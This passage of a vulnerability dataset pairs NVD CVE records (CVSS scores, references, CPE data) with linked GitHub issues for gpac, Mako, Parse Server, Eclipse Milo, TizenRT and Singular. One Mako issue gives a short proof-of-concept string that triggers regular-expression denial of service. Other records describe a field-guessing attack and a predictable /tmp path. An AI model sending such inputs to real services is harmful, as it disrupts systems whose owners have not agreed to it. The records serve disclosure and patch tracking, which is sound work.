AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x10364c) ==15396==ABORTING ```
AddressSanitizer: stack-overflow when processing ISOM_IOD
https://api.github.com/repos/gpac/gpac/issues/2216/comments
0
2022-07-02T17:45:58Z
2022-07-12T17:13:10Z
https://github.com/gpac/gpac/issues/2216
1,292,105,535
2,216
4,106
CVE-2022-40023
2022-09-07T13:15:09.953
Sqlalchemy mako before 1.2.2 is vulnerable to Regular expression Denial of Service when using the Lexer class to parse. This also affects babelplugin and linguaplugin.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sqlalchemy/mako/blob/c2f392e0be52dc67d1b9770ab8cce6a9c736d547/mako/ext/extract.py#L21" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/sqlalchemy/mako/commit/925760291d6efec64fda6e9dd1fd9cfbd5be068c" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/sqlalchemy/mako/issues/366" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00026.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://pyup.io/vulnerabilities/CVE-2022-40023/50870/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/sqlalchemy/mako/blob/c2f392e0be52dc67d1b9770ab8cce6a9c736d547/mako/ext/extract.py#L21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/sqlalchemy/mako/commit/925760291d6efec64fda6e9dd1fd9cfbd5be068c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/sqlalchemy/mako/issues/366" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00026.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://pyup.io/vulnerabilities/CVE-2022-40023/50870/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sqlalchemy:mako:*:*:*:*:*:*:*:*", "matchCriteriaId": "A85380F0-0A58-4E13-B3E3-3DC01E7ABF3F", "versionEndExcluding": "1.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/sqlalchemy/mako/issues/366
[ "Issue Tracking", "Patch" ]
github.com
[ "sqlalchemy", "mako" ]
this will crash the Lexer due to the regex: ```py from mako.lexer import Lexer template = "<%0" + '"' * 3000 Lexer(template).parse ```
quoted sections in tag not grouped correctly
https://api.github.com/repos/sqlalchemy/mako/issues/366/comments
1
2022-08-29T15:48:22Z
2022-08-29T18:06:27Z
https://github.com/sqlalchemy/mako/issues/366
1,354,517,220
366
4,107
CVE-2022-36079
2022-09-07T21:15:08.560
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Internal fields (keys used internally by Parse Server, prefixed by `_`) and protected fields (user defined) can be used as query constraints. Internal and protected fields are removed by Parse Server and are only returned to the client using a valid master key. However, using query constraints, these fields can be guessed by enumerating until Parse Server, prior to versions 4.10.14 or 5.2.5, returns a response object. The patch available in versions 4.10.14 and 5.2.5 requires the maser key to use internal and protected fields as query constraints. As a workaround, implement a Parse Cloud Trigger `beforeFind` and manually remove the query constraints.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8143" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8144" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8143" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8144" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "55B47674-02C1-4BE5-B962-AF328A4F99B5", "versionEndExcluding": "4.10.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "65395D8C-9056-4F74-B1C4-8CB4723CE12A", "versionEndExcluding": "5.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/parse-community/parse-server/issues/8143
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "parse-community", "parse-server" ]
Fixes https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6
fix: brute force guessing of user sensitive data via search patterns (GHSA-2m6g-crv8-p3c6)
https://api.github.com/repos/parse-community/parse-server/issues/8143/comments
4
2022-09-02T17:52:12Z
2022-09-03T09:25:15Z
https://github.com/parse-community/parse-server/pull/8143
1,360,469,071
8,143
4,108
CVE-2022-36079
2022-09-07T21:15:08.560
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Internal fields (keys used internally by Parse Server, prefixed by `_`) and protected fields (user defined) can be used as query constraints. Internal and protected fields are removed by Parse Server and are only returned to the client using a valid master key. However, using query constraints, these fields can be guessed by enumerating until Parse Server, prior to versions 4.10.14 or 5.2.5, returns a response object. The patch available in versions 4.10.14 and 5.2.5 requires the maser key to use internal and protected fields as query constraints. As a workaround, implement a Parse Cloud Trigger `beforeFind` and manually remove the query constraints.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8143" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8144" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/634c44acd18f6ee6ec60fac89a2b602d92799bec" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/e39d51bd329cd978589983bd659db46e1d45aad4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8143" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8144" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/4.10.14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/5.2.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "55B47674-02C1-4BE5-B962-AF328A4F99B5", "versionEndExcluding": "4.10.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "65395D8C-9056-4F74-B1C4-8CB4723CE12A", "versionEndExcluding": "5.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/parse-community/parse-server/issues/8144
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "parse-community", "parse-server" ]
Fixes https://github.com/parse-community/parse-server/security/advisories/GHSA-2m6g-crv8-p3c6
fix: brute force guessing of user sensitive data via search patterns (GHSA-2m6g-crv8-p3c6)
https://api.github.com/repos/parse-community/parse-server/issues/8144/comments
3
2022-09-02T17:52:58Z
2022-09-03T09:24:10Z
https://github.com/parse-community/parse-server/pull/8144
1,360,469,671
8,144
4,109
CVE-2022-25897
2022-09-08T05:15:07.410
The package org.eclipse.milo:sdk-server before 0.6.8 are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/milo/commit/4534381760d7d9f0bf00cbf6a8449bb0d13c6ce5" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/milo/issues/1030" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/milo/pull/1031" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGECLIPSEMILO-2990191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/milo/commit/4534381760d7d9f0bf00cbf6a8449bb0d13c6ce5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/milo/issues/1030" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse/milo/pull/1031" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGECLIPSEMILO-2990191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:milo:*:*:*:*:*:*:*:*", "matchCriteriaId": "21638D30-0B3C-4457-BEBC-022ACACE81A5", "versionEndExcluding": "0.6.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/eclipse/milo/issues/1030
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "eclipse", "milo" ]
The server should allow the maximum number of MonitoredItems that can be created to be configurable via the `OpcUaServerConfigLimits` interface. To best maintain backwards compatibility with the previous server the default value will be `Integer.MAX_VALUE`, which is effectively unlimited.
Allow max MonitoredItems to be configured
https://api.github.com/repos/eclipse-milo/milo/issues/1030/comments
0
2022-08-23T17:26:44Z
2022-08-24T11:12:05Z
https://github.com/eclipse-milo/milo/issues/1030
1,348,292,957
1,030
4,110
CVE-2022-40280
2022-09-08T22:15:08.800
An issue was discovered in Samsung TizenRT through 3.0_GBM (and 3.1_PRE). createDB in security/provisioning/src/provisioningdatabasemanager.c has a missing sqlite3_close after sqlite3_open_v2, leading to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c#L100" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/issues/5627" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.sqlite.org/c3ref/open.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c#L100" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/issues/5627" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.sqlite.org/c3ref/open.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:samsung:tizenrt:1.0:m1:*:*:*:*:*:*", "matchCriteriaId": "6B59E31E-7082-4719-97B6-3ADA43058E65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:samsung:tizenrt:1.1:-:*:*:*:*:*:*", "matchCriteriaId": "E625EE90-3CB6-4405-8827-355369A5917E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:samsung:tizenrt:2.0:-:*:*:*:*:*:*", "matchCriteriaId": "4EF9DBF2-9C4A-42C2-A799-922485902209", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:samsung:tizenrt:3.0:gbm:*:*:*:*:*:*", "matchCriteriaId": "59AD1A65-ECC5-4DC0-A7BB-C616E24A42A2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "772" ]
772
https://github.com/Samsung/TizenRT/issues/5627
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Samsung", "TizenRT" ]
# Affected components affected source code file: external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c # Attack vector(s) Missing sqlite3_close after sqlite3_open_v2. Whether or not an error occurs when it is opened, resources associated with the [database connection](https://www.sqlite.org/c3ref/sqlite3.html) handle should be released by passing it to [sqlite3_close()](https://www.sqlite.org/c3ref/close.html) when it is no longer required. # Suggested description of the vulnerability for use in the CVE DoS vulnerability in createDB() function in Samsung Electronics TizenRT latest version (and earlier) due to missing sqlite3_close after sqlite3_open_v2. # Discoverer(s)/Credits UVScan # Reference(s) https://www.sqlite.org/c3ref/open.html https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/iotivity/iotivity_1.2-rel/resource/csdk/security/provisioning/src/provisioningdatabasemanager.c#L100
Security: DoS vulnerability in function createDB()
https://api.github.com/repos/Samsung/TizenRT/issues/5627/comments
0
2022-09-02T04:54:05Z
2022-09-02T05:14:28Z
https://github.com/Samsung/TizenRT/issues/5627
1,359,701,920
5,627
4,114
CVE-2022-40281
2022-09-08T22:15:08.843
An issue was discovered in Samsung TizenRT through 3.0_GBM (and 3.1_PRE). cyassl_connect_step2 in curl/vtls/cyassl.c has a missing X509_free after SSL_get_peer_certificate, leading to information disclosure.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/curl/vtls/cyassl.c#L545" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/issues/5626" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.openssl.org/docs/man1.1.1/man3/SSL_get_peer_certificate.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/curl/vtls/cyassl.c#L545" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Samsung/TizenRT/issues/5626" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.openssl.org/docs/man1.1.1/man3/SSL_get_peer_certificate.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:samsung:tizenrt:1.0:m1:*:*:*:*:*:*", "matchCriteriaId": "6B59E31E-7082-4719-97B6-3ADA43058E65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:samsung:tizenrt:1.1:-:*:*:*:*:*:*", "matchCriteriaId": "E625EE90-3CB6-4405-8827-355369A5917E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:samsung:tizenrt:2.0:-:*:*:*:*:*:*", "matchCriteriaId": "4EF9DBF2-9C4A-42C2-A799-922485902209", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:samsung:tizenrt:3.0:gbm:*:*:*:*:*:*", "matchCriteriaId": "59AD1A65-ECC5-4DC0-A7BB-C616E24A42A2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/Samsung/TizenRT/issues/5626
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Samsung", "TizenRT" ]
# Affected components affected source code file: external/curl/vtls/cyassl.c # Attack vector(s) Missing X509_free() after SSL_get_peer_certificate(). The X509 object must be explicitly freed using X509_free(). # Suggested description of the vulnerability for use in the CVE Privacy leakage vulnerability in cyassl_connect_step2() function in Samsung Electronics TizenRT latest version (and earlier) due to missing X509_free() after SSL_get_peer_certificate(). # Discoverer(s)/Credits UVScan # Reference(s) https://www.openssl.org/docs/man1.1.1/man3/SSL_get_peer_certificate.html https://github.com/Samsung/TizenRT/blob/f8f776dd183246ad8890422c1ee5e8f33ab2aaaf/external/curl/vtls/cyassl.c#L545
Security: Privacy leakage in function cyassl_connect_step2()
https://api.github.com/repos/Samsung/TizenRT/issues/5626/comments
0
2022-09-02T04:44:13Z
2022-09-02T05:15:36Z
https://github.com/Samsung/TizenRT/issues/5626
1,359,697,306
5,626
4,115
CVE-2022-40299
2022-09-09T01:15:07.853
In Singular before 4.3.1, a predictable /tmp pathname is used (e.g., by sdb.cc), which allows local users to gain the privileges of other users via a procedure in a file under /tmp. NOTE: this CVE Record is about sdb.cc and similar files in the Singular interface that have predictable /tmp pathnames; this CVE Record is not about the lack of a safe temporary-file creation capability in the Singular language.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://michael.orlitzky.com/cves/cve-2022-40299.xhtml" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Singular/Singular/commit/5f28fbf066626fa9c4a8f0e6408c0bb362fb386c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Singular/Singular/issues/1137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://michael.orlitzky.com/cves/cve-2022-40299.xhtml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Singular/Singular/commit/5f28fbf066626fa9c4a8f0e6408c0bb362fb386c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Singular/Singular/issues/1137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:singular:singular:*:*:*:*:*:*:*:*", "matchCriteriaId": "3FE9F514-BE4C-43B5-AAF5-30D4AE629E20", "versionEndExcluding": "4.3.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "330" ]
330
https://github.com/Singular/Singular/issues/1137
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Singular", "Singular" ]
